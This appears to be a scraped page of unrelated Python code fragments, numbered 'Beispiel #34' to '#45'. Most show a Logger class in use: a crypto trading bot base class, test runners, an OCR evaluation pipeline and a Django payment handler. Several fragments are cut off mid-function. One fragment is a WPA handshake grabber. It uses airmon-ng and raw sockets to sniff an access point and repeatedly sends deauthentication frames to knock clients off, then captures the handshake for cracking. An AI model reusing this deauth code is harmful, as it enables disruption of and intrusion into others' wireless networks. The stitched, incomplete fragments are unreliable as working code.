              seasonality=seasonality,
              kinds=config['process'])

    # run the simulation with a certain runtime (runtime). this runtime is not equivalent
    # to the current time (measurements). this should be the seasonality of the system.
    # for example, day or week.
    environment.run(until=int(config['runtime']))

    # Start QueueListener
    if hasattr(logger, "listener"):
        logger.listener.stop()

    return name
Beispiel #34
0
# ----------------------------------------------------------------------------------------------------------------------
# Initialize OS
# ----------------------------------------------------------------------------------------------------------------------
from lib.Kernel import Kernel
from lib.toolkit import load_properties
# Start-up Kernel
kernel = Kernel(load_properties("conf/os.properties"))
log = kernel.logger

# ----------------------------------------------------------------------------------------------------------------------
# Logger
# ----------------------------------------------------------------------------------------------------------------------
import gc
from lib.Logger import Logger

log = Logger()

log.info("Hello!")
log.error("Critical Issue!!")
log.debug("Free memory: " + str(gc.free_mem()))

# ----------------------------------------------------------------------------------------------------------------------
# Update DuckDNS
# ----------------------------------------------------------------------------------------------------------------------
from lib.toolkit import update_duck_dns

# Update DuckDNS service
update_duck_dns("mydomain", "mytoken", "192.168.0.10")

# ----------------------------------------------------------------------------------------------------------------------
#
Beispiel #35
0
class Bot:
	"""This class is an instance of a bot.
	Every bot has a name, a ticker, and period.
	The period can be 1m, 3m, 5m, 15m, 30m, 1h, 2h, 3h, 4h, 1d, 1w.
	A bot can have a period_needed property that will specify how much past data you want at least
	at every loop.
	
	Example: a bot with a time period of 5m and a period_needed of 200 will receive at every loop the 200
	last ticker, 1000 minutes.

	To implement a bot, you just have to override the compute and setup function. Those two functions will be
	called automatically by the timing system.
	Compute will receive the last period_needed candles for the selected asset.

	The data property is a Data object that allows you to store important and persistant information.
	Every important variables or objects should be stored in data, in case the bot is restarted or if the server is down.

	The logger property is an instance of Logger. It allows you to log information in the console and in the
	database and the Dashboard. If you want to log custom metrics, use logger.custom. You will be able to create
	visualizations in Grafana with this logs.

	The config property is the dictionnary with the same name as the bot in the config.

	The exchange property is an instance of Exchange. It allows you to interact with the actual markets.

	The live_mode property indicates if the bot should loop and receive live data. Use it only to test your bot
	live. If you want to backtrack or test your algorithm, leave live_mode = False.
	When live_mode is False, the logger won't log to the DB, and the exchange actions will be simulated.
	"""

	def __init__(self, name, ticker, period, live_mode, periods_needed=200):
		"""
		- name: string, the name of the bot
		- ticker: string, the ticker formatted like that: ASSET1/ASSET2
		- period: string, the period on which the loop will be set, and the resolution of the candles
		- live_mode: bool, should we launch the live loop and start trading live
		- periods_needed: int, the number of candles you will get every loop, optional
		"""
		self.live_mode = live_mode
		self.name = name
		self.ticker = ticker
		self.period_text = period
		self.periods_needed = periods_needed
		self.offset_seconds = 10
		if (not self.name in config.get_config()):
			print("❌ Cannot instantiate bot: no config entry")
			exit(1)
		self.config = config.get_config()[self.name]
		if (not "capitalAllowed" in self.config):
			print("❌ Cannot instantiate bot: no 'capitalAllowed' property")
			exit(1)
		try:
			self.logger = Logger(self.name, live_mode)
		except:
			print("❌ Cannot connect to the log DB, are you sure it's running?")
			raise
		if (self.live_mode):
			self.data = Data(self.name)
		else:
			self.data = Data(self.name + "-test")
		self.exchange = Exchange(self.logger, self.data, self.config['capitalAllowed'], live_mode, self.ticker, self.period_text)
		try:
			self.period = period_matching[period]
		except:
			print("Available periods: 1m, 3m, 5m, 15m, 30m, 1h, 2h, 3h, 4h, 1d, 1w")
			raise
		self.logger.log("ℹ️", f"Bot {self.name} started with a period of {period}")
		self.logger.log("ℹ️", f"Capital allowed: {self.config['capitalAllowed']}%")
		self.setup()
		if (self.live_mode):
			self.preloop()

	def preloop(self):
		"""Waits for the selected period to begin. We use UTC time.
		"""
		while (1):
			current_time = datetime.datetime.utcnow()
			if (self.period < 60):
				if (current_time.minute % self.period == 0 and current_time.second == self.offset_seconds):
					self.loop()
			elif (self.period <= 4 * 60):
				hour_offset = int(self.period / 60)
				if (current_time.hour % hour_offset == 0 and current_time.minute == 0 and current_time.second == self.offset_seconds):
					self.loop()
			elif (self.period <= 1 * 60 * 24):
				if (current_time.hour == 0
					and current_time.minute == 0
					and current_time.second == self.offset_seconds):
					self.loop()
			else:
				if (current_time.weekday() == 0
					and current_time.hour == 0
					and current_time.minute == 0
					and current_time.second == self.offset_seconds):
					self.loop()

	def loop(self):
		"""Once we waited for the period to start, we can loop over the periods. At every period we
		call compute with the latest data.
		"""
		while (1):
			current_time = datetime.datetime.utcnow()
			self.logger.log("ℹ️", f"Downloading latest data at {current_time}")
			data = self.exchange.get_latest_data(self.ticker, self.period_text, self.periods_needed)
			self.logger.price(data.iloc[-1]['close'])
			self.compute(data)
			time.sleep(self.offset_seconds + self.period * 60 - datetime.datetime.now().second)

	def backtest(self, start_date, end_date):
		self.exchange.init_fake_balance()
		self.data.reset()
		price = []
		date = []
		data = self.exchange.get_data(start_date, end_date, self.ticker, self.period_text)
		if (data.shape[0] == 0):
			self.logger.log("❌", "No data for the given time frame")
		for i in range(self.periods_needed, data.shape[0]):
			batch = data.iloc[i - self.periods_needed:i]
			self.exchange.fake_current_price = batch.iloc[-1]['close']
			self.exchange.fake_current_date = batch.iloc[-1]['date']
			price.append(batch.iloc[-1]['close'])
			date.append(batch.iloc[-1]['date'])
			self.compute(batch.copy())
		hist = pd.DataFrame()
		hist['date'] = date
		hist['price'] = price
		for order in self.exchange.fake_orders:
			hist.loc[hist['date'] == order['date'], 'action'] = order['action']
		return (self.exchange.fake_balance, self.exchange.fake_pnl, hist)

	def setup(self):
		"""To implement. Set the bot variable, instantiate classes... This will be done once before the bot
		starts.
		"""
		pass

	def compute(self, data):
		"""To implement. Called every period, you have the latest data available. You can here take decisions.
		"""
		pass
Beispiel #36
0
from lib.Logger import Logger
import logging


def suites():
    suite = unittest.TestSuite()
    loader = unittest.TestLoader()
    suite.addTests(loader.loadTestsFromTestCase(WeatherTest))
    #suite.addTests(loader.loadTestsFromTestCase(BugfreeImportFile))
    # suite.addTests(loader.loadTestsFromTestCase(ProductAdd))
    #suite.addTests(loader.loadTestsFromTestCase(LoginLogoutTest))
    return suite


if __name__ == "__main__":
    logger = Logger(loglevel=logging.ERROR).getlog()
    logger.info('日志开始')

    try:
        suite = suites()
        fp = open(
            './reports/results_%s.html' % time.strftime("%Y-%m-%d %H-%M-%S"),
            'wb')
        runner = HTMLTestRunner(stream=fp,
                                title=u'接口测试报告',
                                description=u"测试用例执行情况:")
        runner.run(suite)
    except Exception, e:
        raise e
    finally:
        fp.close()
from lib.ApacheJiraParser import ApacheJiraParser
import pycurl
from lib.Logger import Logger

# for a in range(890,894):
#     parser = ApacheJiraParser('SENTRY-' + str(a))
#     parser.parse().write()

for a in range(9525,14240):
    parser = ApacheJiraParser('hive', a)

    logger = Logger(__name__)

    try:
        parser.parse().write()
    except pycurl.error as err:
        logger.error("Unable to parse JIRA: %s", 'HIVE-' + str(a))
        logger.error("Error: %s", str(err))
Beispiel #38
0
class E2ERunner(object):
    def __init__(self, config={}, globalConfig={}):
        self.config = Configuration(config)
        self.globalConfig = Configuration(globalConfig)
        self._parse_config()
        self.logger = Logger()
        self.config()

    def _parse_config(self):
        self._parse_blocks(self.config["blocks"])
        self.viz = self._parse_visualizer(self.config.default("viz", None))
        self.gtprov = self._parse_gt(self.config.default("gt", None))
        self.evals = self._parse_evals(self.config.default('eval', []))

    def _parse_blocks(self, blocks):
        self.blocks = [
            self._parse_block(block) for block in blocks
            if "disabled" not in block or not block["disabled"]
        ]

    def _parse_block(self, block):
        if block["type"] == "TextSeparation":
            return TextSeparation(self.globalConfig, block)
        elif block["type"] == "WordDetection":
            return WordDetection(block)
        elif block["type"] == "LineSegmentation":
            return LineSegmentation(block)
        elif block["type"] == "ParagraphDetection":
            return ParagraphDetection(block)
        elif block["type"] == "UnigramLanguageModel":
            return UnigramLanguageModel(block)
        elif block["type"] == "Ceiling":
            return Ceiling(block)
        elif block["type"] == "TranscriptionAndClassification":
            return TranscriptionAndClassification(self.globalConfig, block)

    def _parse_evals(self, eval_configs):
        return [self._parse_eval(config) for config in eval_configs]

    def _parse_eval(self, config):
        if config is None:
            return None
        if config["type"] == "IoU":
            return IoU(config)
        elif config["type"] == "IoUPixelSum":
            return IoUPixelSum(config)
        elif config["type"] == "BagOfWords":
            return BagOfWords(config)
        elif config["type"] == "IoUCER":
            return IoUCER(config)

    def _parse_data(self, data_config):
        if isinstance(data_config, list):
            return data_config
        else:
            prefix = data_config["prefix"] if "prefix" in data_config else ""
            filenames = list(
                filter(
                    lambda f: f.endswith(data_config["suffix"]) and f.
                    startswith(prefix), os.listdir(data_config["path"])))
            if data_config["limit"] > 0:
                filenames = filenames[:data_config["limit"]]
            return [
                os.path.join(data_config["path"], filename)
                for filename in filenames
            ]

    def _parse_visualizer(self, viz_config):
        if viz_config is None:
            return None
        if viz_config["type"] == "RegionVisualizer":
            return RegionVisualizer(viz_config)
        elif viz_config["type"] == "ImageVisualizer":
            return ImageVisualizer(viz_config)
        elif viz_config["type"] == "SeparatedVisualizer":
            return SeparatedVisualizer(viz_config)

    def _parse_gt(self, gt_config):
        if gt_config is None:
            return None
        if gt_config["type"] == "WordRegion":
            return WordRegionGTProvider()
        elif gt_config["type"] == "ParagraphRegion":
            return ParagraphRegionGTProvider()
        elif gt_config["type"] == "LineRegion":
            return LineRegionGTProvider()

    def __call__(self, log_prefix="E2E", skip_range_evaluation=False):
        if not skip_range_evaluation and self.config.default("ranger", False):
            self.logger.write("Entering Range Execution Mode")
            return self._range_exec()
        start = time()
        self.scores = {}
        data = self._parse_data(self.config["data"])
        results = []
        times = []
        for idx, file in enumerate(data):
            file_time = time()
            self.logger.progress(log_prefix, idx, len(data))
            results.append(self._exec(file))
            times.append(time() - file_time)
        [block.close() for block in self.blocks]
        if len(self.evals) > 0:
            final_scores = {
                "time": time() - start,
                "median time": np.median(times),
                "avg time": np.average(times)
            }
            for score_key in self.scores:
                final_scores[score_key] = np.average(self.scores[score_key])
            self.logger.summary(log_prefix, final_scores)
        return results

    def _get_range(self):
        if type(self.config["ranger.values"]) is dict:
            return frange(self.config["ranger.values.from"],
                          self.config["ranger.values.to"],
                          self.config["ranger.values.step"])

    def _range_exec(self):
        def set_config(value):
            for path in self.config.default(
                    "ranger.paths", [self.config.default("ranger.path", [])]):
                current = self.config
                for step in path[:-1]:
                    current = current[step]
                current[path[-1]] = value
            self._parse_config()

        for val in self._get_range():
            set_config(val)
            prefix = self.config.default("ranger.template", "value {}")
            self(log_prefix=prefix.format(val), skip_range_evaluation=True)

    def _exec(self, file):
        original = cv2.imread(file)
        last_output = original.copy()

        for block in self.blocks:
            last_output = block(last_output, file)
        res = {"file": file, "original": original, "result": last_output}
        if self.gtprov is not None:
            gt = self.gtprov(file, original)
        if self.viz is not None:
            vizimage = res["original"].copy()
            if self.gtprov is not None and self.config.default(
                    'gt.viz', False):
                vizimage = self.viz(vizimage, gt, True)
            if len(self.blocks) > 0:
                vizimage = self.viz(vizimage, res["result"], False)
            self.viz.store(vizimage, file)
            res["viz"] = vizimage
        if len(self.evals) > 0:
            for evl in self.evals:
                scores = evl(gt, res["result"])
                for score_key in scores.keys():
                    self.scores[score_key] = [
                        scores[score_key]
                    ] if score_key not in self.scores else [
                        scores[score_key], *self.scores[score_key]
                    ]
        return res
Beispiel #39
0
 def __init__(self, config={}, globalConfig={}):
     self.config = Configuration(config)
     self.globalConfig = Configuration(globalConfig)
     self._parse_config()
     self.logger = Logger()
     self.config()
    def run(form):
        form.status_text.value = "Looking for an AP with active users"

        s = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(0x0003))
        s.bind((form.interface, 0x0003))

        mac_collected = []

        ap_manager = APManager()
        current_state = 'scanning'

        pcap_file = None
        
        last_deauth = None

        while True:
            packet = WpaHandshakeGrabber.getFrame(s)
            frame = Radiotap802_11(packet)

            if current_state == 'scanning':
                if frame.isBeaconFrame():
                    ap = AccessPoint(frame.ssid, frame.channel, frame.bssid_id)
                    ap_manager.addAP(ap)
                elif frame.isAckBlockFrame(): # duplicat below move above
                    target = Target(frame.destination)
                    ap_manager.addTarget(target, frame.source)

                if ap_manager.update() and frame.source not in mac_collected and ap_manager.locked_ap is not 0:
                    current_state = 'ap_locked'

                    # Move me
                    root_dev_name = form.interface.split('mon')[0]
                    Logger.log('Root dev name = {}'.format(root_dev_name))
                    Logger.log('Switching monitor to channel {}'.format(ap_manager.locked_ap.channel))
                    process = subprocess.Popen("airmon-ng stop {};airmon-ng start {} {}".format(form.interface, root_dev_name, ap_manager.locked_ap.channel), shell=True, stdout=subprocess.PIPE)
                    process.wait()

                    s = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(0x0003))
                    s.bind((form.interface, 0x0003))

                    last_deauth = None
                    pcap_file = WpaHandshakeGrabber.startPcap(ap_manager.locked_ap)
                    WpaHandshakeGrabber.switchToLockedTargetView(form, ap_manager.locked_ap.ssid)
            elif current_state == 'ap_locked':
                WpaHandshakeGrabber.writePcap(pcap_file, packet)

                if frame.isAckBlockFrame(): # change this to top like above
                    target = Target(frame.destination)
                    ap_manager.addTarget(target, frame.source)

                if frame.isQOSFrame() and len(packet) == 163 and frame.destination == ap_manager.locked_ap.mac:
                    Logger.log('Handshake Found on {}'.format(ap_manager.locked_ap.ssid))
                    current_state = 'scanning'
                    mac_collected.append(ap_manager.locked_ap.mac)
                    ap_manager.locked_ap = None
                    last_deauth = None

                    root_dev_name = form.interface.split('mon')[0]
                    process = subprocess.Popen("airmon-ng stop {};airmon-ng start {}".format(form.interface, root_dev_name), shell=True, stdout=subprocess.PIPE)
                    process.wait()
                    s = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(0x0003))
                    s.bind((form.interface, 0x0003))
                    continue
                
                if last_deauth is None or time.time() - last_deauth > 60:
                    last_deauth = time.time()
                    target = ap_manager.locked_ap.targets.pop()
                    deauth_frame = Deauth.getDeauthFrame(ap_manager.locked_ap, target)
                    WpaHandshakeGrabber.writePcap(pcap_file, packet)
                    for x in range(0, 3):
                        s.send(deauth_frame)
                            
            
            WpaHandshakeGrabber.updateUI(form, current_state, ap_manager)
class Renderer(object):
  def __init__(self, 
      audio_player=AUDIO_PLAYER, 
      pdf_viewer=PDF_VIEWER, 
      output_directory=OUTPUT_DIR, 
      tmp_directory=TMP_DIRECTORY,
      clean=False,
      verbose=False, 
      log_output="stderr",
      **kwargs):
    
    self._verbose = verbose
    self._logger = Logger(log_output=log_output, role=self.__class__.__name__)
    self._time_str = str(int(time.time()));

 
    self.audio_player = audio_player
    self.pdf_viewer = pdf_viewer
    self.output_directory = output_directory
    self.tmp_directory = TMP_DIRECTORY
    if not os.path.isdir(self.output_directory):
      try:
        os.mkdir(self.output_directory)
      except OSError as e:
        self.log("The path {} already exists.\n"
          "Clear that path or specify a different directory name.".format(self.output_directory)
        )
    if clean:
      self.filename_clean() #for debugging
    
  
  def log(self, m, header_color="", color=""):
    self._logger.log(m, header_color=header_color, color=color, time_str=self._time_str)

  def log_warn(self, m):
    m = "WARNING:{}".format(m)
    self.log(m, header_color=self._logger.RED_WHITE, color=self._logger.YELLOW) 
  
  def log_err(self, m):
    m = "ERROR:{}".format(m)
    self.log(m, header_color=self._logger.RED_WHITE, color=self._logger.RED) 

  def log_info(self, m):
    self.log(m, header_color=self._logger.GREEN, color=self._logger.GREEN);


  def filename_new(self, ext, filename=None):
    if not filename:
      filename = self._time_str
    return "{}.{}".format(os.path.join(self.output_directory, filename), ext);

  def filename_temporary_new(self, ext, filename=None):
    if not filename:
      filename = self._time_str
    return "{}.{}".format(os.path.join(self.tmp_directory, filename), ext);

  def filename_clean(self):
    for f in os.listdir(self.output_directory):
      if self._verbose:
        self.log("Removing {}...".format(f), color=self._logger.BLUE, header_color=self._logger.BLUE)
      os.unlink(os.path.join(self.output_directory, f));


  def _reset_term(self, dummy_a, dummy_b):
        call(["reset", "-I"]);
Beispiel #42
0
                        help='date to continue for',
                        default=MODEL_DATE)
    parser.add_argument('--paper-note-path',
                        default='../paper-notes/data/words')
    parser.add_argument('--model-epoch',
                        help='epoch to continue for',
                        default=MODEL_EPOCH,
                        type=int)
    args = parser.parse_args()

    # TRAINING
    LOG_NAME = '{}-{}'.format("otf-iam-paper", args.model_date)
    model_folder = os.path.join(Constants.MODELS_PATH, LOG_NAME)
    models_path = os.path.join(model_folder,
                               'model-{}'.format(args.model_epoch))
    logger = Logger()
    config = Configuration.load(model_folder, "algorithm")
    algorithm = HtrNet(config['algo_config'])
    dataset = PreparedDataset.PreparedDataset(config['dataset'], False,
                                              config['data_config'])

    algorithm.configure(batch_size=config['batch'],
                        learning_rate=config['learning_rate'],
                        sequence_length=dataset.max_length,
                        image_height=dataset.meta["height"],
                        image_width=dataset.meta["width"],
                        vocab_length=dataset.vocab_length,
                        channels=dataset.channels,
                        class_learning_rate=config.default(
                            'class_learning_rate', config['learning_rate']))
    executor = Executor(algorithm, True, config, logger=logger)
    def __getLogger(self):
        if not self.__logger:
            self.__logger = Logger.openInAppendMode(self.__folderStruct.getRedDotsRawFilepath())

        return self.__logger
	def __init__(self):
		self.logger = Logger(logname='/var/log/houseData.log', loglevel=1, logger="houseDataLogger").getLogger()
Beispiel #45
0
from lib.EncryptUtil import EncryptUtil
pub_key_path = dir_sign + '/lib/pub.key'
pri_key_path = dir_sign + '/lib/pri.key'
enc = EncryptUtil(pub_key_path, pri_key_path)

from django.shortcuts import render
import json
from django.http import HttpResponse
from lib.Logger import Logger
import time
######1、接收到post请求,解密
########2、提取custId、custNm、recevieUrl,新生成traceNo并组装返回给pjs的post报文
########3、根据recevieUrl,post相应的 pjs环境
########4、组装xml报文,发送给pjs前置机 这个暂时不开发

log_debug = Logger('all.log', level='debug')
log_error = Logger('error.log', level='error')

dict_t036 = {
    "orgCode": "105584099990002",
    "custId": "",
    "traceNo": "",
    "reqSn": '',
    "retcode": "00000",
    "errCode": "0000",
    "errMsg": "处理成功",
    "settleDay": "",
    "retMsg": "充值确认交易成功."
}